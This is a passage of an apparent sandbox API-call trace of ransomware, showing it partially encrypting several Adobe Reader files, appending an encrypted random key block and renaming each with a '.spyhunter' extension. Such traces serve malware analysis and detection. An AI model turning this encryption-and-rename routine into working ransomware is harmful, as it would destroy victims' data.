10.0\\Reader\\Locale\\ro_RO\\Weblink.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\weblink.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0116.885] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Weblink.RUM") returned 76 [0116.885] StrStrW (lpFirst="Weblink.RUM", lpSrch=".txt") returned 0x0 [0116.885] GetProcessHeap () returned 0x2c0000 [0116.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0116.885] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0116.963] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0116.963] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0116.963] GetProcessHeap () returned 0x2c0000 [0116.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0116.963] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.963] WriteFile (in: hFile=0x120, lpBuffer=0x57f92c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8ec, lpOverlapped=0x0 | out: lpBuffer=0x57f92c*, lpNumberOfBytesWritten=0x57f8ec*=0x4, lpOverlapped=0x0) returned 1 [0117.030] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8ec*=0x30, lpOverlapped=0x0) returned 1 [0117.030] CloseHandle (hObject=0x120) returned 1 [0117.030] GetProcessHeap () returned 0x2c0000 [0117.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.030] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Weblink.RUM.spyhunter") returned 86 [0117.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Weblink.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\weblink.rum"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Weblink.RUM.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\weblink.rum.spyhunter")) returned 1 [0117.032] GetProcessHeap () returned 0x2c0000 [0117.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.032] GetProcessHeap () returned 0x2c0000 [0117.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.032] GetProcessHeap () returned 0x2c0000 [0117.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6cfa8 | out: hHeap=0x2c0000) returned 1 [0117.032] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f928 | out: pbBuffer=0x57f928) returned 1 [0117.032] GetProcessHeap () returned 0x2c0000 [0117.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.032] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f920*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f920*=0x30) returned 1 [0117.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\updater.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\updater.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.151] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\updater.SKY") returned 76 [0117.151] StrStrW (lpFirst="updater.SKY", lpSrch=".txt") returned 0x0 [0117.151] GetProcessHeap () returned 0x2c0000 [0117.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.151] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0117.194] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.195] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0117.195] GetProcessHeap () returned 0x2c0000 [0117.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.195] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.195] WriteFile (in: hFile=0xec, lpBuffer=0x57f924*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x57f924*, lpNumberOfBytesWritten=0x57f8e4*=0x4, lpOverlapped=0x0) returned 1 [0117.195] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8e4*=0x30, lpOverlapped=0x0) returned 1 [0117.195] CloseHandle (hObject=0xec) returned 1 [0117.195] GetProcessHeap () returned 0x2c0000 [0117.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.195] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\updater.SKY.spyhunter") returned 86 [0117.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\updater.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\updater.sky"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\updater.SKY.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\updater.sky.spyhunter")) returned 1 [0117.319] GetProcessHeap () returned 0x2c0000 [0117.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.319] GetProcessHeap () returned 0x2c0000 [0117.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.319] GetProcessHeap () returned 0x2c0000 [0117.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6e480 | out: hHeap=0x2c0000) returned 1 [0117.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f928 | out: pbBuffer=0x57f928) returned 1 [0117.319] GetProcessHeap () returned 0x2c0000 [0117.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f920*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f920*=0x30) returned 1 [0117.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.326] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\DEXShare.asfx") returned 87 [0117.326] StrStrW (lpFirst="DEXShare.asfx", lpSrch=".txt") returned 0x0 [0117.326] GetProcessHeap () returned 0x2c0000 [0117.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.326] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0117.343] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.344] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0117.344] GetProcessHeap () returned 0x2c0000 [0117.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.344] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.344] WriteFile (in: hFile=0xec, lpBuffer=0x57f924*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x57f924*, lpNumberOfBytesWritten=0x57f8e4*=0x4, lpOverlapped=0x0) returned 1 [0117.352] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8e4*=0x30, lpOverlapped=0x0) returned 1 [0117.352] CloseHandle (hObject=0xec) returned 1 [0117.353] GetProcessHeap () returned 0x2c0000 [0117.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.353] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\DEXShare.asfx.spyhunter") returned 97 [0117.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\dexshare.asfx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\DEXShare.asfx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\dexshare.asfx.spyhunter")) returned 1 [0117.405] GetProcessHeap () returned 0x2c0000 [0117.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.405] GetProcessHeap () returned 0x2c0000 [0117.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.405] GetProcessHeap () returned 0x2c0000 [0117.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e68e48 | out: hHeap=0x2c0000) returned 1 [0117.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f920 | out: pbBuffer=0x57f920) returned 1 [0117.405] GetProcessHeap () returned 0x2c0000 [0117.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f918*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f918*=0x30) returned 1 [0117.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.406] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc") returned 73 [0117.406] StrStrW (lpFirst="AcroSign.prc", lpSrch=".txt") returned 0x0 [0117.406] GetProcessHeap () returned 0x2c0000 [0117.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.406] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f8dc*=0x217e, lpOverlapped=0x0) returned 1 [0117.407] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffde82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.407] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x217e, lpNumberOfBytesWritten=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f8dc*=0x217e, lpOverlapped=0x0) returned 1 [0117.408] GetProcessHeap () returned 0x2c0000 [0117.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.408] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.408] WriteFile (in: hFile=0xec, lpBuffer=0x57f91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x57f91c*, lpNumberOfBytesWritten=0x57f8dc*=0x4, lpOverlapped=0x0) returned 1 [0117.408] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8dc*=0x30, lpOverlapped=0x0) returned 1 [0117.408] CloseHandle (hObject=0xec) returned 1 [0117.408] GetProcessHeap () returned 0x2c0000 [0117.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.408] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc.spyhunter") returned 83 [0117.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc.spyhunter")) returned 1 [0117.409] GetProcessHeap () returned 0x2c0000 [0117.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.409] GetProcessHeap () returned 0x2c0000 [0117.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.409] GetProcessHeap () returned 0x2c0000 [0117.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44448 | out: hHeap=0x2c0000) returned 1 [0117.409] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f920 | out: pbBuffer=0x57f920) returned 1 [0117.409] GetProcessHeap () returned 0x2c0000 [0117.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.409] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f918*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f918*=0x30) returned 1 [0117.409] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.410] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api") returned 73 [0117.410] StrStrW (lpFirst="AcroForm.api", lpSrch=".txt") returned 0x0 [0117.410] GetProcessHeap () returned 0x2c0000 [0117.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.410] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f8dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.424] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.424] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f8dc*=0x2800, lpOverlapped=0x0) returned 1 [0117.425] GetProcessHeap () returned 0x2c0000 [0117.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.425] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.425] WriteFile (in: hFile=0xec, lpBuffer=0x57f91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x57f91c*, lpNumberOfBytesWritten=0x57f8dc*=0x4, lpOverlapped=0x0) returned 1 [0117.499] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8dc*=0x30, lpOverlapped=0x0) returned 1 [0117.499] CloseHandle (hObject=0xec) returned 1 [0117.500] GetProcessHeap () returned 0x2c0000 [0117.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0117.500] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api.spyhunter") returned 83 [0117.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api.spyhunter")) returned 1 [0117.501] GetProcessHeap () returned 0x2c0000 [0117.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0117.501] GetProcessHeap () returned 0x2c0000 [0117.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.501] GetProcessHeap () returned 0x2c0000 [0117.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44368 | out: hHeap=0x2c0000) returned 1 [0117.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f918 | out: pbBuffer=0x57f918) returned 1 [0117.502] GetProcessHeap () returned 0x2c0000 [0117.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f910*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f910*=0x30) returned 1 [0117.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.503] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf") returned 104 [0117.503] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0117.503] GetProcessHeap () returned 0x2c0000 [0117.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.503] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f8d4*=0x2800, lpOverlapped=0x0) returned 1 [0117.515] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.516] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f8d4*=0x2800, lpOverlapped=0x0) returned 1 [0117.516] GetProcessHeap () returned 0x2c0000 [0117.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.516] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.517] WriteFile (in: hFile=0xec, lpBuffer=0x57f914*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f8d4, lpOverlapped=0x0 | out: lpBuffer=0x57f914*, lpNumberOfBytesWritten=0x57f8d4*=0x4, lpOverlapped=0x0) returned 1 [0117.518] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f8d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f8d4*=0x30, lpOverlapped=0x0) returned 1 [0117.518] CloseHandle (hObject=0xec) returned 1 [0117.518] GetProcessHeap () returned 0x2c0000 [0117.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0117.519] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf.spyhunter") returned 114 [0117.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\standardbusiness.pdf.spyhunter")) returned 1 [0117.908] GetProcessHeap () returned 0x2c0000 [0117.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0117.909] GetProcessHeap () returned 0x2c0000 [0117.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0117.909] GetProcessHeap () returned 0x2c0000 [0117.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2200 | out: hHeap=0x2c0000) returned 1 [0117.910] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f910 | out: pbBuffer=0x57f910) returned 1 [0117.910] GetProcessHeap () returned 0x2c0000 [0117.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0117.910] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f908*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f908*=0x30) returned 1 [0117.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0117.913] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf") returned 104 [0117.913] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0117.913] GetProcessHeap () returned 0x2c0000 [0117.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0117.913] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, 